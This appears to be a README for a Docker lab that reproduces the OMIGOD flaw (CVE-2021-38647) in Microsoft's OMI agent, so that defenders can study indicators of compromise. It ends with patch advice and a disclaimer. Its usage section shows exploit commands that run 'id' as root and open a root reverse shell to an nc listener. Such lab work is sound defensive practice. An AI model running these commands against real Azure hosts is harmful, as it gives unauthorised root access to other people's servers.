Open Management Infrastructure (OMI, formerly known as NanoWBEM) is an open source Common Interface Model (CMI) management server by Microsoft and The Open Group. OMI is a software agent found on most of Azure's Linux VMs, yet many do not know of it's presence.
On September 14th the Wiz Research Team published an article detailing four vulnerabilities in OMI. The vulnerabilities are described as easy to exploit, and can allow attackers arbitrary remote code execution and escalation to root with a single request.
CVE-2021-38647 is an unauthenticated RCE vulnerability exploited by sending a crafted HTTP request. CVE-2021-38647 allows an attacker to run commands as the user of the OMI agent, normally root.
OMI agents are widely used on Azure Linux servers when these services are in use:
- Azure Automation
- Azure Automatic Update
- Azure Operations Management Suite
- Azure Log Analytics
- Azure Configuration Management
- Azure Diagnostics
According to Microsoft most Azure services that use OMI deploy it without exposing the HTTP/S port.
The goal of this project is to create a demo environment in a easily replicable way so that Blue teams more easily can find IoC's. To accomplish this goal I create a custom docker image set up with the vulnerable version of OMI.
Depending on your setup, this might require sudo.
# Building the docker container
docker build . -t omi-god
# Running it
docker run --name=omi-god -it omi-godYou will now have a the root terminal up for the docker container. You should get the ip address of the docker container, which can be done with the command:
# Add it to clipboard
docker inspect omi-god | jq ".[0].NetworkSettings.Networks.bridge.IPAddress" | cut -d\" -f2 | xclip -selection clipboard
# Show it in terminal
docker inspect omi-god | jq ".[0].NetworkSettings.Networks.bridge.IPAddress" | cut -d\" -f2When this is set up, you can try to run any PoCs. To run the one in this project, run the following commands:
# Execute any command as root
python3 omigod.py -t 172.17.0.2 -c id
-> uid=0(root) gid=0(root) groups=0(root)
# Get a reverse shell as root on the server
python3 omigod.py -t 172.17.0.2 -r -l 172.17.0.1 -p 4444 & nc -lnvp 4444 IppSec's video regarding this exploit and setting up a similar environment - https://www.youtube.com/watch?v=TXqi1BKtcyM The environment set up in this project is based on IppSec's video.
horizon3ai PoC - https://github.com/horizon3ai/CVE-2021-38647 The PoC in this project is based on horizon3ai's PoC.
For more details see the original researchers' work: https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
All OMI versions below v1.6.8-1 are vulnerable.
There has been published a patched version that fixed this exploit. Update and ensure the version is 1.6.8.1 or above.
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.